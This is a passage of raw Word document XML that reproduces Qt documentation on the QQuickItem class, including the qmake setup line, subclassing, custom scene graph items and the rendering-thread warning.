        <w:spacing w:after="120"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB76FA" w:rsidRPr="00FB76FA" w:rsidRDefault="00FB76FA" w:rsidP="00FB76FA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B4800">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To link against the module</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, add this line to your</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2853" w:history="1">
        <w:r w:rsidRPr="00FB76FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmake</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.pro</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB76FA" w:rsidRPr="00FB76FA" w:rsidRDefault="00FB76FA" w:rsidP="00FB76FA">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:spacing w:after="120"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">QT </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+=</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> quick</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB76FA" w:rsidRPr="00FB76FA" w:rsidRDefault="00FB76FA" w:rsidP="00FB76FA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For more information on the Qt Quick module, see the</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2854" w:history="1">
        <w:r w:rsidRPr="00FB76FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB76FA" w:rsidRDefault="00490E7E" w:rsidP="00D77D11">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2855" w:history="1">
        <w:r w:rsidR="0069433A" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qquickitem.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="0069433A" w:rsidRDefault="0069433A" w:rsidP="001945D5">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2592" w:name="_Toc483001098"/>
      <w:bookmarkStart w:id="2593" w:name="_Toc483004067"/>
      <w:bookmarkStart w:id="2594" w:name="_Toc483604431"/>
      <w:bookmarkStart w:id="2595" w:name="_Toc483605651"/>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQuickItem Class</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2592"/>
      <w:bookmarkEnd w:id="2593"/>
      <w:bookmarkEnd w:id="2594"/>
      <w:bookmarkEnd w:id="2595"/>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="0069433A" w:rsidRDefault="0069433A" w:rsidP="0069433A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:hyperlink r:id="rId2856" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> class provides the </w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>most basic of all visual items in </w:t>
      </w:r>
      <w:hyperlink r:id="rId2857" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="0069433A" w:rsidRDefault="0069433A" w:rsidP="0069433A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All visual items in Qt Quick inherit from </w:t>
      </w:r>
      <w:hyperlink r:id="rId2858" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Although a </w:t>
      </w:r>
      <w:hyperlink r:id="rId2859" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> instance </w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>has no visual appearance</w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, it defines all the attributes that are common across visual items, such as x and y position, width and height, </w:t>
      </w:r>
      <w:hyperlink r:id="rId2860" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>anchoring</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and key handling support.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="0069433A" w:rsidRDefault="0069433A" w:rsidP="0069433A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can subclass </w:t>
      </w:r>
      <w:hyperlink r:id="rId2861" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> to provide your own custom visual item</w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that inherits these features.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="001945D5" w:rsidRDefault="0069433A" w:rsidP="001945D5">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2596" w:name="custom-scene-graph-items"/>
      <w:bookmarkStart w:id="2597" w:name="_Toc483001099"/>
      <w:bookmarkStart w:id="2598" w:name="_Toc483004068"/>
      <w:bookmarkStart w:id="2599" w:name="_Toc483604432"/>
      <w:bookmarkStart w:id="2600" w:name="_Toc483605652"/>
      <w:bookmarkEnd w:id="2596"/>
      <w:r w:rsidRPr="001945D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Custom Scene Graph Items</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2597"/>
      <w:bookmarkEnd w:id="2598"/>
      <w:bookmarkEnd w:id="2599"/>
      <w:bookmarkEnd w:id="2600"/>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="0069433A" w:rsidRDefault="0069433A" w:rsidP="0069433A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All visual QML items are rendered using the scene graph, a low-level, high-performance rendering stack, closely tied to OpenGL</w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. It is possible for subclasses of </w:t>
      </w:r>
      <w:hyperlink r:id="rId2862" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> to add their own custom content into the scene graph by setting the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2863" w:anchor="Flag-enum" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::ItemHasContents</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag and </w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reimplementing the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2864" w:anchor="updatePaintNode" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::updatePaintNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="0069433A" w:rsidRDefault="0069433A" w:rsidP="0069433A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Warning:</w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> It is crucial that OpenGL operations and interaction with the scene graph happens exclusively on the rendering thread, primarily during the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2865" w:anchor="updatePaintNode" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>updatePaintNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() call. The best rule of thumb is to only use classes with the "QSG" prefix inside the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2866" w:anchor="updatePaintNode" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::updatePaintNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
